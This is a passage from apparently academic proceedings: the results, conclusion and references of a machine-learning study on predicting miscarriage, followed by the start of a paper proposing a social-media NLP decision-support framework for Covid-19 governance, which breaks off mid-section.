While checking each attribute's proportion, it was found that 99.7% of
the records were of women aged 25 years. These records dominated the
entire dataset and would create a biased classification. Hence, stratified sampling has been
performed, where a fixed stratum size is considered for every age group; for each
age value, the corresponding feature records were retained. This task has
been performed to maintain equal proportions, balance the data, and remove the
dataset's bias. After selection, the total number of records was 1775 with ten
attributes.
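A rough sketch of this age-stratified selection is given below, assuming the DataFrame df from the previous sketch with an "age" column; the stratum size per age group is an illustrative guess, since only the final total of 1775 records is reported:

    # Sketch: stratified sampling with a fixed number of records per age value,
    # used to remove the dominance of 25-year-old records. The column name "age"
    # and the stratum size are assumptions for illustration.
    import pandas as pd

    def stratify_by_age(df: pd.DataFrame, per_age: int, seed: int = 42) -> pd.DataFrame:
        parts = []
        for _, group in df.groupby("age"):
            parts.append(group.sample(n=min(per_age, len(group)), random_state=seed))
        return pd.concat(parts).reset_index(drop=True)

    balanced_df = stratify_by_age(df, per_age=75)
    print(balanced_df.shape)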

3.3 Model Building and Validation

80% of the dataset has been used to train the algorithms, while the remaining 20% has been used for testing.
The algorithms used for model building are K-nearest neighbor (KNN), logistic
regression, and random forest.
Fig. 1 Process diagram of the study

Fig. 2 Correlation of the attributes considered for the study

KNN is a supervised classification algorithm and needs labeled data for training.
The class of a test data point is predicted from the available class labels by finding
the distance between the test point and the k nearest trained feature values. This process
involves calculating the distance between data points using distance measures
such as Euclidean distance, Manhattan distance, Hamming distance, and Minkowski
distance. The main steps of KNN are as follows: load the data, calculate the distances,
find the closest neighbors, vote for the labels, and assign the winning label to the test point.
For choosing the optimal value of K, a plot of the error rate against K values in a defined
range is derived. Then, the K value having the minimum error rate is chosen.
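A minimal, non-authoritative sketch of this K-selection procedure with scikit-learn is shown below; the feature matrix X, the target vector y, the 80/20 split, and the K range 1-20 are illustrative assumptions rather than details reported by the authors:

    # Sketch: 80/20 split, then choose K as the value with the minimum error rate.
    import numpy as np
    import matplotlib.pyplot as plt
    from sklearn.model_selection import train_test_split
    from sklearn.neighbors import KNeighborsClassifier

    # Assumed inputs, e.g. X = balanced_df.drop(columns=["target"]), y = balanced_df["target"]
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)

    k_values = list(range(1, 21))
    error_rates = []
    for k in k_values:
        knn = KNeighborsClassifier(n_neighbors=k)   # Minkowski/Euclidean distance by default
        knn.fit(X_train, y_train)
        error_rates.append(np.mean(knn.predict(X_test) != y_test))

    best_k = k_values[int(np.argmin(error_rates))]  # K with the minimum error rate
    plt.plot(k_values, error_rates, marker="o")
    plt.xlabel("K")
    plt.ylabel("Error rate")
    plt.show()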
Logistic regression is a supervised algorithm used to divide the dataset into classes
by estimating the probabilities using a sigmoid/logistic function. The aim is to find
the best fitting model to describe the relationship between the binary dependent
variable and a set of independent variables. There are some assumptions in logistic
regression which include the following:

• For binary logistic regression, the dependent variable needs to be binary. The first
level of the dependent variable factor should also represent the desired outcome.
• The model should have negligible or no multicollinearity.
• Logistic regression needs a large sample size.
Random forest is a supervised algorithm used for both classification and regression;
this work focuses on its use as a classification technique. A random forest is constructed
from multiple decision trees. It is preferred over a single decision tree as it uses an
ensemble learning approach, averaging the results and reducing overfitting. The steps
involved in random forest are: selection of random samples, construction of a decision
tree for every sample to obtain an individual prediction, voting over the predicted results,
and selection of the voted result with the highest frequency as the final prediction.
The model validation has been performed using the K-fold cross-validation tech-
nique, where K’s value is taken as 10. The performance metrics used here are the
confusion matrix, accuracy, precision, recall, F1 score, AUC score, and ROC curve.
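Continuing the same sketch (reusing the split and best_k from above, with scikit-learn default hyperparameters chosen only for illustration), the three models can be trained, cross-validated with K = 10, and scored with the listed metrics:

    # Sketch: train KNN, logistic regression, and random forest, validate with
    # 10-fold cross-validation, and report the metrics used in this study.
    from sklearn.neighbors import KNeighborsClassifier
    from sklearn.linear_model import LogisticRegression
    from sklearn.ensemble import RandomForestClassifier
    from sklearn.model_selection import cross_val_score
    from sklearn.metrics import classification_report, confusion_matrix, roc_auc_score

    models = {
        "KNN": KNeighborsClassifier(n_neighbors=best_k),
        "Logistic Regression": LogisticRegression(max_iter=1000),
        "Random Forest": RandomForestClassifier(n_estimators=100, random_state=42),
    }

    for name, model in models.items():
        cv_acc = cross_val_score(model, X, y, cv=10, scoring="accuracy")  # K-fold with K = 10
        model.fit(X_train, y_train)
        y_pred = model.predict(X_test)
        print(name, "10-fold CV accuracy:", round(cv_acc.mean(), 3))
        print(confusion_matrix(y_test, y_pred))
        print(classification_report(y_test, y_pred))                      # precision, recall, F1
        print("AUC:", roc_auc_score(y_test, model.predict_proba(X_test)[:, 1]))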

4 Experimental Results and Discussion

The accuracy obtained for K-Nearest Neighbor, Logistic Regression, and Random
Forest is 95, 97, and 97%, respectively. Therefore, it can be concluded that the random
forest model correctly predicts whether a woman will have a miscarriage 97% of the time.
The precision is 100% for all three models for women labeled to have no miscar-
riage. For logistic regression and random forest, the precision obtained is 95% for
women labeled to have a miscarriage. For K-nearest neighbor, the precision obtained
is 94% for women labeled to have a miscarriage.
In all the three models, the recall obtained is 94% for women labeled to have no
miscarriage. The recall obtained is 100% for women labeled to have a miscarriage
in all three models.
In all three models, the F1 score obtained is 97% for both women labeled to have
a miscarriage and no miscarriage.
From the ROC curve obtained as shown in Fig. 3, it is evident that all three models
have high separability power, which means that they have high chances of accurately
classifying a new case. As the ROC curve for random forest and logistic regression is
slightly above that of K-nearest neighbor, the chances of classification are somewhat
better for them.
Therefore, all the three techniques considered for the classification here have high
accuracy. However, random forest and logistic regression show greater accuracy than
KNN. Random forest is recommended for application in practical situations as it is
based on ensemble learning, prevents overfitting, and has useful functionality.

Fig. 3 ROC curve for the ML models

5 Conclusion

This work highlights the various machine learning classification models constructed
to predict miscarriage during the early stages of pregnancy. A comparative analysis is
done to check the constructed models' performance using standard evaluation metrics.
This will help the patient and the concerned experts take
the necessary precautions to prevent miscarriage. Primary data collection was not
possible from the healthcare centers due to the COVID-19 scenario. The study is
limited to a few classification algorithms. We plan to extend this work by collecting
data primarily from hospital records and using other classification and regression
techniques.

References

1. Magnus, M. C., Wilcox, A. J., Morken, N. H., Weinberg, C. R., & Håberg, S. E. (2019). Role
of maternal age and pregnancy history in risk of miscarriage: Prospective register based study.
BMJ (Online), 364, 1–8.
2. Bruno, V., D’Orazio, M., Ticconi, C., Abundo, P., Riccio, S., Martinelli, E., Rosato, N., Piccione,
E., Zupi, E., & Pietropolli, A. (2020). Machine learning (ML) based-method applied in recurrent
pregnancy loss (RPL) patients diagnostic work-up: A potential innovation in common clinical
practice. Scientific Reports, 10(1), 1–12. https://doi.org/10.1038/s41598-020-64512-4
3. Liu, L., Jiao, Y., Li, X., Ouyang, Y., & Shi, D. (2020). Machine learning algorithms to predict
early pregnancy loss after in vitro fertilization-embryo transfer with fetal heart rate as a strong
predictor. Computer Methods and Programs in Biomedicine, 196, 105624. https://doi.org/10.
1016/j.cmpb.2020.105624

4. Pruthi, J. (2018). A walkthrough of prediction for pregnancy complications using machine
learning: A retrospective. In 4th International Conference on Computers and Management
(ICCM) (pp. 338–343).
5. Asri, H., Mousannif, H., & Moatassime, H. A. (2017). Real-time miscarriage prediction
with SPARK. Procedia Computer Science, 113, 423–428. https://doi.org/10.1016/j.procs.2017.
08.272
6. Srinivasa Rao, A. S. R., & Diamond, M. P. (2020). Deep learning of Markov model-
based machines for determination of better treatment option decisions for infertile women.
Reproductive Sciences, 27(2), 763–770. https://doi.org/10.1007/s43032-019-00082-9
7. San Lazaro Campillo, I., Meaney, S., Corcoran, P., Spillane, N., & O’Donoghue, K. (2019). Risk
factors for miscarriage among women attending an early pregnancy assessment unit (EPAU):
a prospective cohort study. Irish Journal of Medical Science, 188(3), 903–912. https://doi.org/
10.1007/s11845-018-1955-2
8. Koivu, A., & Sairanen, M. (2020). Predicting risk of stillbirth and preterm pregnancies with
machine learning. Health Information Science Systems, 8, 14. https://doi.org/10.1007/s13755-
020-00105-9
9. Malacova, E., Tippaya, S., Bailey, H. D., et al. (2020). Stillbirth risk prediction using machine
learning for a large cohort of births from Western Australia, 1980–2015. Science and Reports,
10, 5354. https://doi.org/10.1038/s41598-020-62210-9
10. Liu, H., Li, J., Leng, J., Wang, H., Liu, J., Li, W., Liu, H., Wang, S., Ma, J., Chan, J. C. N., Yu,
Z., Hu, G., Li, C., & Yang, X. (2020, February). Machine learning risk score for prediction of
gestational diabetes in early pregnancy in Tianjin, China. Diabetes/Metabolism Research and
Reviews. https://doi.org/10.1002/dmrr.3397
11. Lakshmi, B. N., Indumathi, T. S., & Ravi, N. (2016). A study on C.5 decision tree classification
algorithm for risk predictions during pregnancy. Procedia Technology, 24, 1542–1549. https://
doi.org/10.1016/j.protcy.2016.05.128
12. Gárate-Escamilla, A. K., Garza-Padilla, E., Carvajal Rivera, A., Salas-Castro, C., Andrès, E., &
Hajjam El Hassani, A. (2020). Cluster analysis: A new approach for identification of underlying
risk factors and demographic features of first trimester pregnancy women. Journal of Clinical
Medicine, 9(7), 2247. https://doi.org/10.3390/jcm9072247
13. Chang, J., & Sarkar, I. N. (2019). Using unsupervised clustering to identify pregnancy co-
morbidities. In AMIA Joint Summits on Translational Science Proceedings. AMIA Joint Summits
on Translational Science, no. 1 (pp. 305–314).
14. Tahir, M., Badriyah, T., & Syarif, I. (2018). Neural networks algorithm to inquire previous
preeclampsia factors in women with chronic hypertension during pregnancy in childbirth
process. In 2018 International Electronics Symposium on Knowledge Creation and Intelligent
Computing (IES-KCIC) (pp. 51–55). Bali, Indonesia. https://doi.org/10.1109/KCIC.2018.862
8588
15. Andriani, F., & Mardhiyah, I. (2019, March). Blighted ovum detection using convolutional
neural network. In AIP Conference Proceedings, 2084. https://doi.org/10.1063/1.5094276
16. Maylawati, D. S. A., Ramdhani, M. A., Zulfikar, W. B., Taufik, I., & Darmalaksana, W. (2017).
Expert system for predicting the early pregnancy with disorders using artificial neural network.
In 2017 5th International Conference on Cyber and IT Service Management, CITSM 2017.
https://doi.org/10.1109/CITSM.2017.8089243
17. Mu, Y., Feng, K., Yang, Y., & Wang, J. (2018). Applying deep learning for adverse pregnancy
outcome detection with pre-pregnancy health data. MATEC Web of Conferences, 189. https://
doi.org/10.1051/matecconf/201818910014
18. Krisnanik, E., Tambunan, K., & Irmanda, H. N. (2019). Analysis of pregnancy risk factors
for pregnant women using analysis data based on expert system. In Proceedings—1st Interna-
tional Conference on Informatics, Multimedia, Cyber and Information System, ICIMCIS 2019
(pp. 151–156). https://doi.org/10.1109/ICIMCIS48181.2019.8985211
19. Moreira, M. W. L., Rodrigues, J. J. P. C., Kumar, N., Al-Muhtadi, J., & Korotaev, V. (2018).
Nature-inspired algorithm for training multilayer perceptron networks in e-health environments
for high-risk pregnancy care. Journal of Medical Systems, 42(3). https://doi.org/10.1007/s10
916-017-0887-0

20. Shafi, N., Bukhari, F., Iqbal, W., Almustafa, K. M., Asif, M., & Nawaz, Z. (2020). Cleft
prediction before birth using deep neural network. Health Informatics Journal, 54590. Available
at https://doi.org/10.1177/1460458220911789
21. Moreira, M. W. L., Rodrigues, J. J. P. C., Carvalho, F. H. C., Chilamkurti, N., Al-Muhtadi, J.,
& Denisov, V. (2019). Biomedical data analytics in mobile-health environments for high-risk
pregnancy outcome prediction. Journal of Ambient Intelligence and Humanized Computing,
10(10), 4121–4134. https://doi.org/10.1007/s12652-019-01230-4
22. Badriyah, T., Savitri, N. A., Sa’adah, U., & Syarif, I. (2020). Application of naive bayes method
for IUGR (Intra Uterine Growth Restriction) diagnosis on the pregnancy. In 2020 International
Conference on Electrical, Communication, and Computer Engineering (ICECCE) (pp. 1–4).
Istanbul, Turkey. https://doi.org/10.1109/ICECCE49384.2020.9179256
23. Tayal, D. K., Meena, K., Pragya, & Kumar, S. (2018). Analysis of various data mining tech-
niques for pregnancy related issues and postnatal health of infant using machine learning and
fuzzy logic. In 2018 3rd International Conference on Communication and Electronics Systems
(ICCES) (pp. 789–793). Coimbatore, India. https://doi.org/10.1109/CESYS.2018.8724082
24. Campero-jurado, I., Robles-camarillo, D., & Simancas-acevedo, E. (2020). Problems in
pregnancy, modeling fetal mortality through the Naïve Bayes classifier. 11(3), 121–129.
25. Despotović, D., Zec, A., Mladenović, K., Radin, N., & Turukalo, T. L. (2018). A machine
learning approach for an early prediction of preterm delivery. In 2018 IEEE 16th International
Symposium on Intelligent Systems and Informatics (SISY ) (pp. 000265-000270). Subotica.
https://doi.org/10.1109/SISY.2018.8524818
26. Asri, H., Mousannif, H., & Al Moatassime, H. (2018). Comprehensive miscarriage dataset for
an early miscarriage prediction. Data in Brief, 19, 240–243. https://doi.org/10.1016/j.dib.2018.
05.012
Efficacious Governance During
Pandemics Like Covid-19 Using
Intelligent Decision Support Framework
for User Generated Content

Rajni Jindal and Anshu Malhotra

Abstract During the unprecedented global health emergency caused by the pan-
demic Covid-19, the governments and nationalized organizations of all countries
are struggling to control its spread by enforcing various measures, and also manage
its social and economic impact through policy intervention. In such a critical situation, it
becomes imperative to take data driven decisions. User generated content over online
social media is an untapped data source that can be leveraged to gain insights for
effective governance and decision making; and can also serve as a first hand commu-
nication medium between the various government bodies and citizens. In this paper,
we have proposed a novel governance framework that leverages user generated con-
tent on social media for effective decision making by the authorities. We have used
topic modelling techniques to discover social-economic trends, and to understand
the issues or concerns of public interest. We used information extraction techniques
like noun and verb phrase extraction, and Named Entity Recognition to measure
the geographical spread, identify Covid-19 hotspots, assist in contact tracing, and
discovering new health conditions. From the available literature, we could not find
any intelligent framework for effective governance during pandemics, where user
generated content has been utilized for real time decision making. In this paper, we
address this real-world problem through our proposed decision support system, and
demonstrate, as a proof of concept, how it can be used for effective governance
during pandemics through its prototype implementation.

Keywords Decision support · Decision making · Intelligent computing · Big data
analytics · Machine learning · Natural language processing · Covid-19 ·
Governance · Online social networks

Both authors contributed equally.

R. Jindal · A. Malhotra (B)


Delhi Technological University, Delhi, India
e-mail: rajnijindal@dce.ac.in


1 Introduction

The world today is witnessing an unprecedented crisis situation caused by the outbreak of
the novel coronavirus (SARS-CoV-2) that originated in Wuhan, China, in December
2019. In March 2020, the World Health Organization officially characterized the wildfire-like
global spread of this Covid-19 respiratory disease as the first ever pandemic
caused by a coronavirus.1 WHO advised governments of all nations to find innovative
ways to prevent its spread and protect their citizens, and reiterated the need
for effective leadership and preparedness on the public health frontier. One year down
the line, the governments of all nations across the globe are still grappling to control
its spread, minimize the death toll, and manage the social and economic collapse caused
by the pandemic. These are tough and unforeseen times for governments, and no
playbook is available to guide them about the measures and policies needed,
their effectiveness and acceptance by people, their short-term and long-term impact,
what strategies to adopt for vaccination, and what it will take to finally recover from
the social and economic losses that the pandemic will leave behind.

1 https://www.who.int/director-general/speeches/detail/who-director-general-s-opening-remarks-at-the-media-briefing-on-covid-19—11-March-2020.
In the current global health crisis scenario, interdisciplinary research becomes
indispensable, and it is absolutely necessary for government bodies, healthcare professionals,
economists and social scientists, public nationalized institutions, and healthcare
bodies to come together to control the pandemic while simultaneously minimizing
the collateral damage to society and the economy [1]. Alamo et al. have emphasized the
need for data-driven approaches for monitoring, forecasting, modelling, taking timely
decisions, and measuring the effectiveness of those government measures and actions
[1].
Swapnarekha et al., in their review paper, have also emphasized the need
for forecasting and prediction techniques for developing government strategies to
control the spread of the pandemic [2], whereas Bullock et al. have highlighted
the requirement and importance of government policy attention and intervention for
effective management of the ongoing pandemic situation [3]. Our research is along
similar lines: we propose an intelligent decision support system using machine
learning, big data analytics, and natural language processing over publicly available
user generated content on social media for efficacious governance during pandemics
like Covid-19.
Salient Research Contributions: The governments of all the nations across the
globe are grappling to contain the spread of the Covid-19 pandemic, minimize the fatalities,
and at the same time understand and manage the collateral social and economic
trends and public concerns. In this paper, we have proposed an intelligent decision
support framework, built over publicly available user generated content on
social media, for effective governance during such pandemics or any crisis situation.
We use various big data and text analytics techniques, along with unsupervised
machine learning, which are explained in detail in the following sections. Our proposed
automated framework can be quickly and easily developed and deployed by government
bodies and various other national organizations, and can assist in the following
tasks that are otherwise difficult to accomplish in a real time, time-bound manner even
with large human bandwidth:
• In our proposed framework, we use topic modelling techniques to discover and
predict various social and economic trends at national and regional level; and to
understand issues and public concerns. This serves as a useful input for policy
intervention and formulation to manage the collateral impact caused by the pan-
demic in all social-economic public and private sectors.
• We used unsupervised information extraction and aggregation techniques like:
Noun and verb phrase extraction, Named Entity Recognition and clustering on
user generated content from social media to measure geographical spread, identify
Covid-19 hotspots, assist in contact tracing, and discover new symptoms and health
condition indicators.
• We have done a prototype implementation of our proposed framework as a proof-
of-concept that it can serve as a decision-making tool for effective governance
during such health emergencies. This is a novel idea for governance during pan-
demics, as we could not find a similar framework from the existing literature
survey.
These are the major contributions of our proposed framework that are explained in
the subsequent sections with implementation results on a sample dataset. The related
literature survey is discussed in the following section.

2 Related Literature Survey

The scope of this section is to discuss the relevant research published in the last year
since the pandemic outbreak, where machine learning and natural language tech-
niques have been used for Covid-19 related applications and use cases, specifically
utilizing user generated content from social media. Even though some research has
been done for opinion and sentiment analysis related to Covid-19 from social media;
we did not find any research or prototype where a comprehensive framework has
been proposed or implemented for effective governance and management of social-
economic issues due to the unprecedented pandemic situation caused by the novel
Corona virus.
Oyebode et al. have analysed the sentiment polarity of Covid-19 related com-
ments from various social media by extracting opinionated key phrase and themes
using predefined POS grammar rules (context based NLP techniques). This tech-
nique helped in discovering positive and negative themes/issues related to Covid-19
across various categories (e.g. economics, education, socio-political) and understanding
the corresponding public perceptions [4]. Samuel et al. have performed very basic
sentiment classification of Covid-19 related Tweets using logistic regression and Naïve
Bayes [5]; another study analyses the emotions and sentiments evoked by English
news headlines [6]. A study using NLP feature engineering techniques, trend analysis
using unsupervised clustering and topic modelling has been done on Reddit
Mental Health Support groups dataset to understand the change in anxiety levels
in people before and during the pandemic [7]. An EBKA, i.e. evidence-based knowledge
acquisition, approach has been demonstrated to aggregate novel and trustworthy
information from social media to augment the information about events happening
in the real world, in this case Covid-19 [8].
Chen et al. have extensively reviewed the datasets and systems related to NLP
techniques for biomedical research, e.g. entity recognition in medical documents,
Q&A answering for building chatbots for Covid-19, discovering medical concepts and
literature based discovery, understanding EHR (electronic health records); however,
the social media text analytics has not been covered in much detail [9].
Swapnarekha et al. have done an extensive state of the art review of the existing
machine learning and intelligent computing research that is being done for diagnosis,
classification, forecasting, prediction and prevention of Covid-19 [2]. They have pro-
vided an extensive in depth review about how different machine learning and big data
analytics techniques are being used for various use cases related to Covid-19 pan-
demic. Some of the examples are: using algorithms like random forests, XGBoost,
SVM for detection of Covid-19 from chest/lungs X-rays and CT Scans; analysing
the impact of policy measures like social distancing, wearing masks in reducing
the transmission; use of linear regression, neural networks for forecasting and trend
prediction. A similar survey has been done by Bullock et al. to map the landscape
of AI & ML based applications that have been developed for Covid-19 across three
broad categories: Molecular (e.g. protein structure prediction, drug development,
vaccine discovery etc.); Clinical (e.g. medical imaging for diagnosis, disease track-
ing and prediction) and Societal (e.g. modelling and forecasting statistics, clustering
of nations based on various factors, public policy etc.) [3]. We used this review paper
specifically to understand the state of the AI & ML applications that have been devel-
oped for societal use cases. Though most of the research has been done for modelling
and forecasting the statistics related to spread of Covid-19; some very preliminary
and basic applications have been built to leverage the online social media for under-
standing public opinion and sentiment analysis, propagation of misinformation and
hate speech, and efficacy of public policy. As we could gauge from these two review
papers, not much research has been done to leverage machine learning and intelli-
gent computing techniques coupled with publicly available data over social media
for designing effective governance measures during pandemics. This research gap is
the main focus and contribution of our research paper; since real time big data from
social media is an untapped resource and can serve as an excellent decision making
tool for government bodies and help them better understand the public issues and
concerns at state and national level.

3 Proposed Framework

Our novel proposed framework for effective governance during pandemics like
Covid-19 is depicted in Fig. 1 and is explained in detail in this section. Our proposed
governance framework consists of three main modules: (1) a text pre-processing
pipeline, (2) an information extraction module, and (3) a social-economic trend prediction
module. The idea is to have real-time tools developed and deployed which monitor
the publicly available user generated content on social media and serve as a decision
support system giving meaningful insights to various government and nationalized
bodies. Such tools and technologies can assist decision making related to the governance
measures and policies required in the short and long term to handle crisis situations like
the one the world has been facing since 2020 due to the global pandemic of Covid-19.

Fig. 1 Proposed framework for efficacious governance during pandemics like Covid-19

3.1 Text Pre-processing Pipeline

This module is a mandatory precursor to any analysis or system that leverages user
generated content from various popular social media platforms, mainly because
user generated content is non-standardized, is multimodal and multilingual in nature,
contains heterogeneous platform-specific information, contains noise, and is error
prone. Hence, before utilizing machine learning, big data, and text analytics techniques,
the following pre-processing steps become essential.
Extract Platform Specific Information: Platform-specific non-textual information
like geolocation tags, @ mentions, and # tags must be separated from the textual content
in the user's posts. Even though this information is noise for any NLP-based system,

Extract user’s Geolocation, @ mentions, #tags, if available


@
Text Preprocessing Pipeline

User’s Social Media Cleaning: remove noise i.e.


Posts special characters, numbers, Tokenization,
emoticons, URLs, hashtags, Lemmatization, Chunking
mentions, stop words etc. and & POS Tagging
convert to lower case

Processed & Cleaned


User Generated Text

Entity Recognition: People, Countries / States /


Topic Modelling using LDA &
Noun Phrase Detection Verb Phrase Detection Cities, Locations, Buildings, Organizations &
GSDMM
Institutions, Objects, Events, Date etc.

Unsupervised ML for Information Aggregation


Socio-Economic Global Trends
Information Extraction Module: Prediction Module
to measure geographical spread, identify hotspots, contact tracing & discover new symptoms

Fig. 1 Proposed framework for efficacious governance during pandemics like Covid-19
440 R. Jindal and A. Malhotra

in the scope of our current application it can be very useful
for contact tracing and identifying Covid-19 hotspots. Hence, we extract and store the
geolocation tags, # tags, and @ mentions that are used to tag people from the user's
social media posts.
Cleaning and Noise Removal: In order to standardize the text from the user’s
social media posts and enhance the data quality of input to NLP and ML algorithms
that follow, it is essential to remove the noisy elements from texts. We pre-process the
text in the user’s posts by removing the special characters, punctuations, numerics,
emoticons, and URLs (which are very common in social media posts); the hashtags
and mentions have already been removed in the previous step. Next, we also remove
the stop words (like a, the, and, etc.) as they do not add any value with respect to the
information extraction and trend prediction we wish to accomplish. Finally, case conversion is
done to bring uniformity, as people are usually not very case conscious while posting
on social media.
Tokenization: This is a fundamental step of any NLP pipeline in order to break or
extract meaningful tokens from the input text document, sentence or phrase. Tokens
are the logical inputs to any NLP algorithm and can be created in three ways: word level,
sub-word level (i.e. n-grams), or character level. In our application, since we aim to
infer meaningful topics, trends, and entities, we perform word-level tokenization to
extract the bag of words from users' social media posts.
Lemmatization: This is the process of reducing the words in the document
vocabulary to the root word from which they are derived, in order to group together
and analyse the different inflected forms of the same base word as a single entity.
Unlike stemming, which is a very crude heuristic process that chops off the affixes of a
word, lemmatization is done using proper grammatical and morphological rules and
correct identification of parts of speech. This step reduces the dimensionality of the
documents (in our case, users' social media posts) and makes the feature matrix less
sparse.
Chunking and POS Tagging: The bag-of-words (tokens) approach described above
loses meaningful information about the semantic structure and actual meaning
of the sentence. Chunking, along with part-of-speech tagging, basically refers to
extracting phrases of words from the sentence to understand the logical sentence
structure. It helps to derive the various constituents from unstructured text, i.e. nouns,
pronouns, adjectives, verbs, adverbs, prepositions, conjunctions, and interjections.
Chunking and POS tagging are essential steps of Named Entity Recognition (NER),
which helps us extract various constituents like names, places, events, dates, etc.
from unstructured text. Additionally, for the topic modelling and thematic analysis
of user generated text, it is important to retain logically related phrases instead
of mere individual tokens.
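A compact, illustrative sketch of such a pre-processing pipeline is given below; it assumes English-language posts and uses spaCy's small pretrained model en_core_web_sm, which, along with the regular expressions, is our own illustrative choice rather than a detail specified above:

    # Sketch: separate platform-specific metadata, clean the text, then tokenize,
    # lemmatize, and POS-tag it with spaCy.
    import re
    import spacy

    nlp = spacy.load("en_core_web_sm")   # tokenizer, POS tagger, lemmatizer, parser, NER

    def preprocess(post: str):
        hashtags = re.findall(r"#\w+", post)              # keep # tags separately
        mentions = re.findall(r"@\w+", post)              # keep @ mentions separately
        text = re.sub(r"http\S+|www\.\S+", " ", post)     # drop URLs
        text = re.sub(r"[@#]\w+", " ", text)              # drop hashtags and mentions from the text
        text = re.sub(r"[^A-Za-z\s]", " ", text).lower()  # drop numbers/special chars, lowercase
        doc = nlp(text)
        tokens = [(tok.lemma_, tok.pos_) for tok in doc
                  if tok.is_alpha and not tok.is_stop]    # lemmas of non-stop-word tokens + POS tags
        return hashtags, mentions, tokens

    print(preprocess("Day 3 of #lockdown in Delhi, feeling anxious @WHO https://t.co/xyz"))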

3.2 Information Extraction Module

This module of our proposed system is designed to achieve the following goals:
measure geographical spread, identify Covid-19 hotspots, and assist in contact tracing
to identify probable cases, discover new symptoms and health condition indicators
related to the ongoing pandemic disease. Unstructured textual data (user’s post)
contains a vast amount of information, all of which may not be relevant for us in the
current context. Information extraction is basically a NLP task where we retrieve the
information of interest within the context of current information need and extract
structured pieces of information from free flowing text. We may be looking for
different pieces of information like names of entities, relationship between entities, a
place, a date, sequence of events, an idea, thought or a state of being. In our research,
our goal is to extract person names, places/locations, organizations, action verbs and
state of being which will help us in measuring geographical spread of pandemic,
identifying hotspots, contact tracing and discovering new health indicators related to
the pandemic. We have used three different information extraction techniques: Noun
phrase detection, Verb phrase detection and Named Entity Recognition to accomplish
the above mentioned tasks; the methodology and techniques adopted are explained
in detail below.
Noun and Verb Phrase Detection: In any communication language, there are
eight parts of speech that determine the grammatical role a word plays in
the sentence. These are: nouns, pronouns, adjectives, verbs, adverbs, prepositions,
conjunctions, and interjections. In the NLP domain, the task of determining and assigning
a correct part-of-speech tag to each word in a sentence based on the role it plays is
called POS tagging. POS tagging helps to understand sentence structure and build
rules to extract the relevant information of interest. We use this NLP technique to
identify the noun and verb phrases in the user's posts, which are the most informative
pieces of the posts for our research problem. Nouns, as we all know, represent
people, places, things, and ideas, and verbs are action words or words that depict
a state of being. We implement POS tagging and build rules to extract noun and
verb phrases. This helps ascertain the geographical spread of the pandemic based on
statistical analysis of the user posts related to Covid-19 on social media within the
region and time duration of interest. We extracted proper nouns which could be the
names of people a user may have met or places he may have visited. The location tags
and mentions if available from the previous pre-processing step help to accurately
determine the user location and people who he may have come in contact with. The
government healthcare bodies can use this technique for effective contact tracing
which has proved to be a successful measure worldwide to contain the spread of the
pandemic. The world witnessed the Covid-19 pandemic for the first time, and hence,
during the initial days of the pandemic, new symptoms of Covid-19 were still being
added to the WHO list.2 Automated techniques like the one proposed in our framework
can discover possibly associated new symptoms and health indicators related to a
pandemic through aggregation and statistical analysis of verb phrases from the
Covid-19 related user generated content on social media. The verb phrases extracted
are action verbs and words that denote a state of being. These can be retrieved from
users' posts, as it was observed that users were writing about their health condition due to
the anxiety, uncertainty, and paranoia related to Covid-19 in the initial months. Now
also, as the world is commencing the vaccination phase, this technique can assist government
bodies in discovering health indicators that users post about, in order to know in a timely
manner the adverse effects of the vaccinations, which have been developed in expedited
record time.

2 https://www.who.int/emergencies/diseases/novel-coronavirus-2019/advice-for-public.
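As an illustrative sketch (our own minimal rules, not the exact rules built by the authors), noun phrases, proper nouns, and verb phrases can be extracted from a post using spaCy's POS tags and noun-chunk iterator:

    # Sketch: extract noun chunks, proper nouns (possible people/places), and verbs
    # (action words or words denoting a state of being) from a post.
    import spacy

    nlp = spacy.load("en_core_web_sm")

    def extract_phrases(post: str):
        doc = nlp(post)
        noun_chunks = [chunk.text for chunk in doc.noun_chunks]
        proper_nouns = [tok.text for tok in doc if tok.pos_ == "PROPN"]
        verbs = [tok.lemma_ for tok in doc if tok.pos_ in ("VERB", "AUX")]
        return noun_chunks, proper_nouns, verbs

    print(extract_phrases("I met Rahul at Connaught Place yesterday and I am feeling feverish"))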
Entity Recognition: We use the popular NLP and AI based automated informa-
tion extraction technique called Named Entity Recognition (NER) to further augment
the information retrieved from users’ unstructured textual posts. NER is the task of
locating and identifying named atomic elements or entities from unstructured text,
and classifying them into predefined categories such as: people names, locations,
organization and company names, date and time objects, quantifying measures, cur-
rencies, artefacts, etc. As per the English dictionary, an entity is defined as a thing or
a concept with distinct characteristics and an independent existence. Unlike POS tagging,
which assigns part-of-speech tags to each word token, NER is able to extract
entities which may be a single word or word phrases (chunks) referring to the same
concept, thereby giving more meaningful learning and generating valuable insights
from large volumes of unstructured text. Machine learning models need to be trained
with relevant language literature to make them learn the different entity categories
and granular rules so that they are able to locate and identify the relevant entities
from unstructured text. In case of basic applications, one may even use a lexicon or
rule based NER system. However, in our niche and specialized use case, we would
need ML based trained models to build a generalized and scalable NER system that
works efficiently in a real time global application.
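A minimal sketch of this step with spaCy's pretrained English model is shown below; the pretrained model is general purpose, so the entity labels printed (e.g. PERSON, GPE, ORG, DATE) are illustrative rather than a domain-tuned output:

    # Sketch: named entity recognition on a Covid-19 related post.
    import spacy

    nlp = spacy.load("en_core_web_sm")
    doc = nlp("Two new Covid-19 cases were reported in Mumbai on 30 April 2020, "
              "says the Health Ministry")

    for ent in doc.ents:
        print(ent.text, "->", ent.label_)   # e.g. Mumbai -> GPE, 30 April 2020 -> DATE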
Information Aggregation: We have proposed a decision support framework for
effective governance related decision making during the pandemics using the unstruc-
tured data from users' social media posts. An essential and desirable characteristic
of such an application is the ability to work in real time and process data streams
on a 24×7 continuous basis. In order to handle the volume and velocity of the incom-
ing unstructured data stream in real time and for efficient processing, it is essential
to aggregate and categorize the information into meaningful buckets with logically
related and similar data. For this purpose, we implement unsupervised machine
learning algorithms: K -Means clustering and hierarchical agglomerative clustering
to group and aggregate the semantically related and similar information extracted
above. We group and cluster the similar noun and verb phrases and entities collected
above for quick consumption and comprehension by government officials from vari-
ous nationalized bodies working for pandemic management and containment. These
clusters of valuable information pieces can be presented to them via a dashboard or
a key word based search tool.
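A rough sketch of this aggregation step is given below; the example phrases, the TF-IDF representation, and the number of clusters are illustrative assumptions:

    # Sketch: bucket semantically similar extracted phrases using TF-IDF vectors and K-means.
    from sklearn.feature_extraction.text import TfidfVectorizer
    from sklearn.cluster import KMeans

    phrases = ["fever and dry cough", "high fever", "lockdown in delhi",
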